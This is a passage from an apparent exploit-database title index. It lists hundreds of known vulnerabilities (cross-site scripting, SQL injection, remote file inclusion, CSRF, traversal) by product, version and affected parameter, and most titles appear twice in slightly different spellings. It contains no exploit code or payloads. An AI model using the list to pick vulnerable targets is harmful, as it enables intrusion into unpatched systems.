'windowed' Parameter Cross Site Scripting Siena CMS 1.242 - 'err' Parameter Cross-Site Scripting WordPress WP Live.php 1.2.1 - 's' Parameter Cross-Site Scripting PHPB2B 4.1 - 'q' Parameter Cross-Site Scripting FuseTalk Forums 3.2 - 'windowed' Parameter Cross-Site Scripting Axis M10 Series Network Cameras Cross Site Scripting Axis M10 Series Network Cameras Cross-Site Scripting Pet Listing 'preview.php' Cross Site Scripting Pet Listing 'preview.php' Cross-Site Scripting WordPress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross Site Scripting WordPress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross-Site Scripting WordPress flash-album-gallery Plugin 'flagshow.php' Cross Site Scripting WordPress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross Site Scripting Fork CMS 3.1.5 Multiple Cross Site Scripting Vulnerabilities Pulse Pro 1.7.2 Multiple Cross Site Scripting Vulnerabilities WordPress flash-album-gallery Plugin 'flagshow.php' Cross-Site Scripting WordPress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities BrowserCRM 5.100.1 Multiple Script URI XSS BrowserCRM 5.100.1 - Multiple Script URI XSS Nagios XI Multiple Cross Site Scripting and HTML Injection Vulnerabilities Nagios XI - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities Websense 7.6 Triton Report Management Interface Cross Site Scripting Websense 7.6 Triton Report Management Interface Cross-Site Scripting PHP Booking Calendar 10e 'page_info_message' Parameter Cross Site Scripting PHP Booking Calendar 10e 'page_info_message' Parameter Cross-Site Scripting PHPShop CMS 3.4 Multiple Cross Site Scripting and SQL Injection PHPShop CMS 3.4 - Multiple Cross-Site Scripting and SQL Injection epesi BIM 1.2 rev 8154 Multiple Cross-Site Scripting Vulnerabilities Barracuda Control Center 620 - Cross Site Scripting / HTML Injection epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection WordPress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross Site Scripting WordPress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross Site Scripting TextPattern 4.4.1 - 'ddb' Parameter Cross Site Scripting WordPress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross-Site Scripting WordPress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross-Site Scripting TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting Limny 3.0.1 - 'login.php' Script Cross Site Scripting Limny 3.0.1 - 'login.php' Script Cross-Site Scripting Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross Site Scripting UBB.threads 7.5.6 'Username' Field Cross Site Scripting Yaws 1.88 - Multiple Cross Site Scripting / HTML Injection Vulnerabilities StatIt 4 - 'statistik.php' Multiple Cross Site Scripting Vulnerabilities Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting UBB.threads 7.5.6 'Username' Field Cross-Site Scripting Yaws 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities VertrigoServ 2.25 - 'extensions.php' Script Cross Site Scripting VertrigoServ 2.25 - 'extensions.php' Script Cross-Site Scripting DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection DIGIT CMS 1.0.7 Cross-Site Scripting and SQL Injection SonicWall AntiSpam & EMail 7.3.1 Multiple Security vulnerabilities Gregarius 0.6.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities Advanced File Management 1.4 - 'users.php' Cross Site Scripting SonicWall AntiSpam & EMail 7.3.1 - Multiple Security vulnerabilities Gregarius 0.6.1 - Multiple SQL Injection / Cross-Site Scripting Advanced File Management 1.4 - 'users.php' Cross-Site Scripting PHP-Fusion 7.2.4 - 'downloads.php' Cross Site Scripting PHP-Fusion 7.2.4 - 'downloads.php' Cross-Site Scripting KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities KnowledgeTree 3.x Multiple Cross-Site Scripting Vulnerabilities MailEnable 6.02 - 'ForgottonPassword.aspx' Cross Site Scripting MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site Scripting PHP Membership Site Manager Script 2.1 - 'index.php' Cross Site Scripting PHP Ringtone Website 'ringtones.php' Multiple Cross Site Scripting Vulnerabilities BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities PHP Membership Site Manager Script 2.1 - 'index.php' Cross-Site Scripting PHP Ringtone Website 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities BoltWire 3.4.16 - Multiple 'index.php' Cross-Site Scripting Vulnerabilities ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities Beehive Forum 101 Multiple Cross Site Scripting Vulnerabilities phpVideoPro 0.8.x/0.9.7 Multiple Cross Site Scripting Vulnerabilities Giveaway Manager 'members.php' Cross Site Scripting Annuaire PHP 'sites_inscription.php' Multiple Cross Site Scripting Vulnerabilities ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities Beehive Forum 101 - Multiple Cross-Site Scripting Vulnerabilities phpVideoPro 0.8.x/0.9.7 - Multiple Cross-Site Scripting Vulnerabilities Giveaway Manager 'members.php' Cross-Site Scripting Annuaire PHP 'sites_inscription.php' Multiple Cross-Site Scripting Vulnerabilities OneOrZero AIMS 'index.php' Cross Site Scripting OneOrZero AIMS 'index.php' Cross-Site Scripting Syneto Unified Threat Management 1.3.3/1.4.2 Multiple Cross Site Scripting and HTML Injection Vulnerabilities Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities Acidcat ASP CMS 3.5 Multiple Cross Site Scripting Vulnerabilities Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross Site Scripting WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross-Site Scripting WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross Site Scripting xClick Cart 1.0.x - 'shopping_url' Parameter Cross Site Scripting WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross-Site Scripting xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting Lead Capture 'login.php' Script Cross Site Scripting Lead Capture 'login.php' Script Cross-Site Scripting phpLDAPadmin 1.2.2 - 'base' Parameter Cross Site Scripting phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross Site Scripting GForge 5.7.1 Multiple Cross Site Scripting Vulnerabilities phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities iknSupport 'search' Module Cross Site Scripting iknSupport 'search' Module Cross-Site Scripting project-open 3.4.x - 'account-closed.tcl' Cross Site Scripting project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting Simple Groupware 0.742 - 'export' Parameter Cross Site Scripting Simple Groupware 0.742 - 'export' Parameter Cross-Site Scripting eFront 3.6.10 - 'administrator.php' Cross Site Scripting eFront 3.6.10 - 'administrator.php' Cross-Site Scripting LxCenter Kloxo 6.1.10 Multiple HTML Injection Vulnerabilities CubeCart 3.0.20 Multiple Script redir Parameter Arbitrary Site Redirect LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities CubeCart 3.0.20 - Multiple Script redir Parameter Arbitrary Site Redirect RabbitWiki 'title' Parameter Cross Site Scripting RabbitWiki 'title' Parameter Cross-Site Scripting Zimbra 'view' Parameter Cross Site Scripting Zimbra 'view' Parameter Cross-Site Scripting Basic Analysis and Security Engine (BASE) 1.4.5 base_db_setup.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_common.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_display.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_form.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_main.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_local_rules.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_logout.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_main.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_maintenance.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_payload.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 help/base_setup_help.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_action.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_cache.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_db.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_include.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_output_html.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_output_query.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_state_criteria.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_state_query.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 setup/base_conf_contents.php Multiple Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_db_setup.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_common.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_display.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_form.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_main.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_local_rules.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_logout.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_main.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_maintenance.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_payload.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - help/base_setup_help.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_action.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_cache.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_db.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_include.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_html.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_query.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_criteria.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_query.inc.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - setup/base_conf_contents.php Multiple Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 setup/setup2.php ado_inc_php Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_qry_alert.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_qry_common.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_alerts.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_class.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_common.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_iplink.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ports.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - setup/setup2.php ado_inc_php Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_alert.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_common.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_alerts.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_class.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_common.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_iplink.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ports.php BASE_path Parameter Remote File Inclusion WordPress Duplicator 0.5.14 - SQL Injection & CSRF WordPress Duplicator 0.5.14 - SQL Injection / CSRF Linux Kernel 3.13 / <= 3.14 (Ubuntu) - splice() System Call Local DoS Linux Kernel 3.13 / 3.14 (Ubuntu) - splice() System Call Local DoS Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_sensor.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_sensor.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_time.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_uaddr.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_user.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_user.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 index.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 admin/base_useradmin.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 admin/index.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php Crafted File Upload Arbitrary Code Execution Basic Analysis and Security Engine (BASE) 1.4.5 - index.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php BASE_path Parameter Remote File Inclusion Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload Arbitrary Code Execution ProWiki 'id' Parameter Cross Site Scripting ProWiki 'id' Parameter Cross-Site Scripting LEPTON 1.1.3 - Cross Site Scripting LEPTON 1.1.3 - Cross-Site Scripting Tube Ace - 'q' Parameter Cross Site Scripting Tube Ace - 'q' Parameter Cross-Site Scripting ButorWiki 3.0 - 'service' Parameter Cross Site Scripting ButorWiki 3.0 - 'service' Parameter Cross-Site Scripting F*EX 20100208/20111129-2 Multiple Cross Site Scripting Vulnerabilities F*EX 20100208/20111129-2 - Multiple Cross-Site Scripting Vulnerabilities CPG Dragonfly CMS 9.3.3.0 Multiple Multiple Cross Site Scripting Vulnerabilities CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities ContentLion Alpha 1.3 - 'login.php' Cross Site Scripting Dolibarr 3.2 Alpha Multiple Directory Traversal Vulnerabilities ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting Dolibarr 3.2 Alpha - Multiple Directory Traversal Vulnerabilities Oxwall 1.1.1 - 'plugin' Parameter Cross Site Scripting Oxwall 1.1.1 - 'plugin' Parameter Cross-Site Scripting Webglimpse 2.x Multiple Cross Site Scripting Vulnerabilities Webglimpse 2.x Multiple Cross-Site Scripting Vulnerabilities Bontq 'user/' URI Cross Site Scripting Bontq 'user/' URI Cross-Site Scripting starCMS 'q' Parameter URI Cross Site Scripting starCMS 'q' Parameter URI Cross-Site Scripting Fork CMS 3.2.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities NetDecision 4.6.1 Multiple Directory Traversal Vulnerabilities Fork CMS 3.2.x Multiple Cross-Site Scripting and HTML Injection Vulnerabilities NetDecision 4.6.1 - Multiple Directory Traversal Vulnerabilities WordPress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload WordPress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS / CSRF / File Upload Omnistar Live Cross Site Scripting and SQL Injection Omnistar Live Cross-Site Scripting and SQL Injection Max's Guestbook 1.0 Multiple Remote Vulnerabilities Max's Guestbook 1.0 - Multiple Remote Vulnerabilities JavaBB 0.99 - 'userId' Parameter Cross Site Scripting JavaBB 0.99 - 'userId' Parameter Cross-Site Scripting Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities phpMyVisites 2.4 phpmv2/index.php Multiple Cross Site Scripting Vulnerabilities singapore 0.10.1 - 'gallery' Parameter Cross Site Scripting EJBCA 4.0.7 - 'issuer' Parameter Cross Site Scripting phpMyVisites 2.4 phpmv2/index.php Multiple Cross-Site Scripting Vulnerabilities singapore 0.10.1 - 'gallery' Parameter Cross-Site Scripting EJBCA 4.0.7 - 'issuer' Parameter Cross-Site Scripting Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross-Site Scripting VFront 0.99.2 CSRF & Persistent XSS VFront 0.99.2 - CSRF / Persistent XSS Minify 2.1.x - 'g' Parameter Cross Site Scripting Minify 2.1.x - 'g' Parameter Cross-Site Scripting CMSimple 3.3 - 'index.php' Cross Site Scripting CMSimple 3.3 - 'index.php' Cross-Site Scripting Open Journal Systems (OJS) 2.3.6 Multiple Script Arbitrary File Upload Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload AtMail 1.04 Multiple Security Vulnerabilities Event Calendar PHP 'cal_year' Parameter Cross Site Scripting AtMail 1.04 - Multiple Security Vulnerabilities Event Calendar PHP 'cal_year' Parameter Cross-Site Scripting Zumset.com FbiLike 1.00 - 'id' Parameter Cross Site Scripting Zumset.com FbiLike 1.00 - 'id' Parameter Cross-Site Scripting Matthew1471 BlogX Multiple Cross Site Scripting Vulnerabilities WordPress Integrator 1.32 - 'redirect_to' Parameter Cross Site Scripting Invision Power Board 4.2.1 - 'searchText' Parameter Cross Site Scripting Matthew1471 BlogX Multiple Cross-Site Scripting Vulnerabilities WordPress Integrator 1.32 - 'redirect_to' Parameter Cross-Site Scripting Invision Power Board 4.2.1 - 'searchText' Parameter Cross-Site Scripting eZ Publish 4.x - 'ezjscore' Module Cross Site Scripting eZ Publish 4.x - 'ezjscore' Module Cross-Site Scripting JamWiki 1.1.5 - 'num' Parameter Cross Site Scripting JamWiki 1.1.5 - 'num' Parameter Cross-Site Scripting JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross Site Scripting JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross-Site Scripting Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross Site Scripting Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross-Site Scripting Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities Forma LMS 1.3 - Multiple PHP Object Injection Vulnerabilities WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities CitrusDB 2.4.1 - Local File Inclusion and SQL Injection Matterdaddy Market 1.1 Multiple SQL Injection BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities WordPress Uploadify Integration Plugin 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities CitrusDB 2.4.1 - Local File Inclusion / SQL Injection Matterdaddy Market 1.1 - Multiple SQL Injection BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities Forma LMS 1.3 Multiple SQL Injection Forma LMS 1.3 - Multiple SQL Injection Bioly 1.3 - 'index.php' Cross Site Scripting and SQL Injection Joomla! Beatz Plugin 1.1 Multiple Cross Site Scripting Vulnerabilities Bioly 1.3 - 'index.php' Cross-Site Scripting / SQL Injection Joomla! Beatz Plugin 1.1 - Multiple Cross-Site Scripting Vulnerabilities WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities WordPress Yahoo Answer Plugin Multiple Cross-Site Scripting Vulnerabilities Acuity CMS 2.6.2 - 'UserName' Parameter Cross Site Scripting Acuity CMS 2.6.2 - 'UserName' Parameter Cross-Site Scripting Pendulab ChatBlazer 8.5 - 'username' Parameter Cross Site Scripting Pendulab ChatBlazer 8.5 - 'username' Parameter Cross-Site Scripting concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross Site Scripting gpEasy 2.3.3 - 'jsoncallback' Parameter Cross Site Scripting Quick.CMS 4.0 - 'p' Parameter Cross Site Scripting concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting Croogo CMS 1.3.4 Multiple HTML Injection Vulnerabilities SKYUC 3.2.1 - 'encode' Parameter Cross Site Scripting Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities SKYUC 3.2.1 - 'encode' Parameter Cross-Site Scripting WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross-Site Scripting MySQLDumper 1.24.4 Multiple Script Direct Request Information Disclosure MySQLDumper 1.24.4 - Multiple Script Direct Request Information Disclosure iGuard Security Access Control Device Firmware 3.6.7427A Cross Site Scripting iGuard Security Access Control Device Firmware 3.6.7427A Cross-Site Scripting Ramui Forum Script 'query' Parameter Cross Site Scripting Ramui Forum Script 'query' Parameter Cross-Site Scripting PivotX 2.3.2 - 'ajaxhelper.php' Cross Site Scripting PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross Site Scripting WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting WordPress GRAND Flash Album Gallery 1.71 - 'admin.php' Cross Site Scripting Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross Site Scripting WordPress GRAND Flash Album Gallery 1.71 - 'admin.php' Cross-Site Scripting Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross-Site Scripting Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross Site Scripting Vulnerabilities WordPress Network Publisher 5.0.1 - 'networkpub_key' Cross Site Scripting Download Manager 2.2.2 - 'cid' Parameter Cross Site Scripting PDF & Print Button Joliprint 1.3.0 Multiple Cross Site Scripting Vulnerabilities CataBlog WordPress Plugin 1.6 'admin.php' Cross Site Scripting 2 Click Social Media Buttons 0.32.2 Multiple Cross Site Scripting Vulnerabilities iFrame Admin Pages 0.1 - 'main_page.php' Cross Site Scripting WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities WordPress Network Publisher 5.0.1 - 'networkpub_key' Cross-Site Scripting Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities CataBlog WordPress Plugin 1.6 'admin.php' Cross-Site Scripting 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting WordPress Newsletter Manager Plugin 1.0 - Multiple Cross-Site Scripting Vulnerabilities Media Library Categories Multiple Cross Site Scripting Vulnerabilities LeagueManager 3.7 Multiple Cross Site Scripting Vulnerabilities Media Library Categories Multiple Cross-Site Scripting Vulnerabilities LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities GD Star Rating 1.9.16 'tpl_section' Parameter Cross Site Scripting Mingle Forum 1.0.33 - 'admin.php' Multiple Cross Site Scripting Vulnerabilities GD Star Rating 1.9.16 'tpl_section' Parameter Cross-Site Scripting Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities Pretty Link Lite WordPress Plugin 1.5.2 - SQL Injection / Cross Site Scripting Pretty Link Lite WordPress Plugin 1.5.2 - SQL Injection / Cross-Site Scripting WordPress zM Ajax Login & Register Plugin 1.0.9 Local File Inclusion WordPress Sharebar Plugin 1.2.1 - SQL Injection / Cross Site Scripting Share and Follow 1.80.3 - 'admin.php' Cross Site Scripting WordPress Soundcloud Is Gold 2.1 - 'width' Parameter Cross Site Scripting WordPress Track That Stat 1.0.8 Cross Site Scripting LongTail JW Player 'debug' Parameter Cross Site Scripting WordPress zM Ajax Login & Register Plugin 1.0.9 - Local File Inclusion WordPress Sharebar Plugin 1.2.1 - SQL Injection / Cross-Site Scripting Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting WordPress Soundcloud Is Gold 2.1 - 'width' Parameter Cross-Site Scripting WordPress Track That Stat 1.0.8 Cross-Site Scripting LongTail JW Player 'debug' Parameter Cross-Site Scripting backupDB() 1.2.7a 'onlyDB' Parameter Cross Site Scripting backupDB() 1.2.7a 'onlyDB' Parameter Cross-Site Scripting Unijimpe Captcha 'captchademo.php' Cross Site Scripting Artiphp 5.5.0 Neo - 'index.php' Multiple Cross Site Scripting Vulnerabilities Unijimpe Captcha 'captchademo.php' Cross-Site Scripting Artiphp 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities PHP Address Book 7.0 Multiple Cross Site Scripting Vulnerabilities PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities Yandex.Server 2010 9.0 - 'text' Parameter Cross Site Scripting Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting phphq.Net phAlbum 1.5.1 - 'index.php' Cross Site Scripting RuubikCMS 1.1.x - Cross Site Scripting / Information Disclosure / Directory Traversal phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal AZ Photo Album - Cross Site Scripting / Arbitrary File Upload AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Inclusion Nilehoster Topics Viewer 2.3 - Multiple SQL Injection and Local File Inclusion AzDGDatingMedium 1.9.3 Multiple Remote Vulnerabilities AzDGDatingMedium 1.9.3 - Multiple Remote Vulnerabilities WHMCompleteSolution (WHMCS) 5.0 Multiple Application Function CSRF WHMCompleteSolution (WHMCS) 5.0 - Multiple Application Function CSRF VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross Site Scripting VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross-Site Scripting WeBid Multiple Cross Site Scripting And LDAP Injection Vulnerabilities WeBid Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities Koha 3.20.1 - Multiple XSS and XSRF Vulnerabilities Koha 3.20.1 - Multiple XSS / XSRF Vulnerabilities XAMPP for Windows 1.7.7 - Multiple Cross Site Scripting / SQL Injection SPIP 2.x Multiple Cross Site Scripting Vulnerabilities XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injection SPIP 2.x Multiple Cross-Site Scripting Vulnerabilities Juniper Networks Mobility System Software 'aaa/wba_login.html' Cross Site Scripting Juniper Networks Mobility System Software 'aaa/wba_login.html' Cross-Site Scripting MediaWiki 1.x - 'uselang' Parameter Cross Site Scripting MediaWiki 1.x - 'uselang' Parameter Cross-Site Scripting Simple Document Management System 1.1.5 Multiple SQL Injection Webify Multiple Products - Multiple HTML Injection and Local File Inclusion Squiz CMS Multiple Cross Site Scripting and XML External Entity Injection Vulnerabilities Simple Document Management System 1.1.5 - Multiple SQL Injection Webify Multiple Products - Multiple HTML Injection / Local File Inclusion Squiz CMS Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities Mahara 1.4.1 Multiple Cross Site 